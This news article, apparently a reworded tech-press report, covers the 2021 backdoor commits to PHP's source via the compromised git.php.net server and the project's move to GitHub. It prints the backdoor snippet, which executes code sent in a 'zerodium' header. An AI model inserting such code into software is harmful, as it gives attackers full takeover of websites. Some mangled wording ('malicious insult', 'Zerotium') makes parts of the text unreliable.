A hacker has compromised the server used to distribute the PHP programming language and added a backdoor to the source code that would have left websites vulnerable to full takeover, members of the open source project said.
Two updates pushed to the PHP Git server over the weekend added a rule that, if run by a PHP-powered website, would have allowed unauthorized visitors to run code of their choice. The malicious commits here and here gave the code the code injection capability to visitors who had the word “zerodium” in an HTTP header.
PHP.net hacked, code backdoored
The commitments have been made to the php-src repo under the account names of two well-known PHP developers, Rasmus Lerdorf and Nikita Popov. “We don’t know exactly how this happened yet, but everything points to a compromise of the git.php.net server (rather than a compromise of an individual git account),” Popov wrote in a post published Sunday night. .
In the wake of the compromise, Popov said PHP administrators have concluded that their standalone Git infrastructure poses an unnecessary security risk. As a result, they will shut down the git.php.net server and make GitHub the official source for PHP repositories. In the future, all changes to the PHP source code will be made directly in GitHub rather than in git.php.net.
The malicious changes came to the public eye of developers, including Markus Staab, Jake Birchallf and Michael Voříšek, by Sunday night as they scrutinized a commit made on Saturday. The update, which claimed to fix a typo, was done under an account that used Lerdorf’s name. Shortly after the first discovery, Voříšek saw the second malicious insult, which was made under Popov’s account name. It claimed to fix the previous typo.
Both commits added the same lines of code:
onvert_to_string(enc);
if (strstr(Z_STRVAL_P(enc), "zerodium")) {
zend_try {
zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");
Zerodium is a broker that buys exploits from researchers and sells them to government agencies for use in investigations or other purposes. Why the commits Zerodium is referenced is not clear. The CEO of the company, Chaouki Bekrar, said on Twitter Monday that Zerotium was not involved.
“Cheers to the troll who put ‘Zerodium’ in the current PHP git compromised commits,” he wrote. “Of course we have nothing to do with this. Probably the researcher(s) who found this bug/exploit tried to sell it to many entities, but nobody wanted to buy this crap, so they burned it for fun.
Cheers to the troll who put “Zerodium” in today’s PHP compromised commits. Of course we have nothing to do with this.
Probably the researcher(s) who found this bug/exploit tried to sell it to many entities but no one wanted to buy this crap so they burned it for fun 😃
— Chaouki Bekrar (@cBekrar) March 29, 2021
bad karma
Prior to the compromise, The PHP Group handled all write access to the repository on their own git server http://git.php.net/ using what Popov called a “homegrown” system called Karma. It offered developers different levels of access rights depending on previous contributions. GitHub, meanwhile, had been a mirror repository.
Now the PHP Group is leaving the self-hosted and managed git infrastructure and replacing it with GitHub. The change means that GitHub is now the “canonical” repository. The PHP Group will no longer use the Karma system. Instead, contributors must be part of the PHP organization on GitHub and must use two-factor authentication for accounts with the ability to make commits.
This weekend’s event isn’t the first time php.net servers have been hacked with the intent of launching a supply chain attack. In early 2019, the widely used PHP extension and application repository temporarily shut down most of the site after discovering that hackers had replaced the main package manager with a malicious one. Group developers said anyone who downloaded the package manager in the past six months should get a fresh copy.
PHP manages an estimated 80 percent of websites. There are no reports of websites incorporating the malicious changes into their production environments.
The changes were likely made by people who wanted to brag about their unauthorized access to the PHP Git server rather than backdooring websites that use PHP, said HD Moore, co-founder and CEO of network discovery platform Rumble.
“It sounds like the attackers are trolling Zerodium or trying to give the impression that the code has been behind the scenes for much longer,” he told Ars. “Anyway, I’d spend a lot of time going through past commits if I had security interests in PHP.”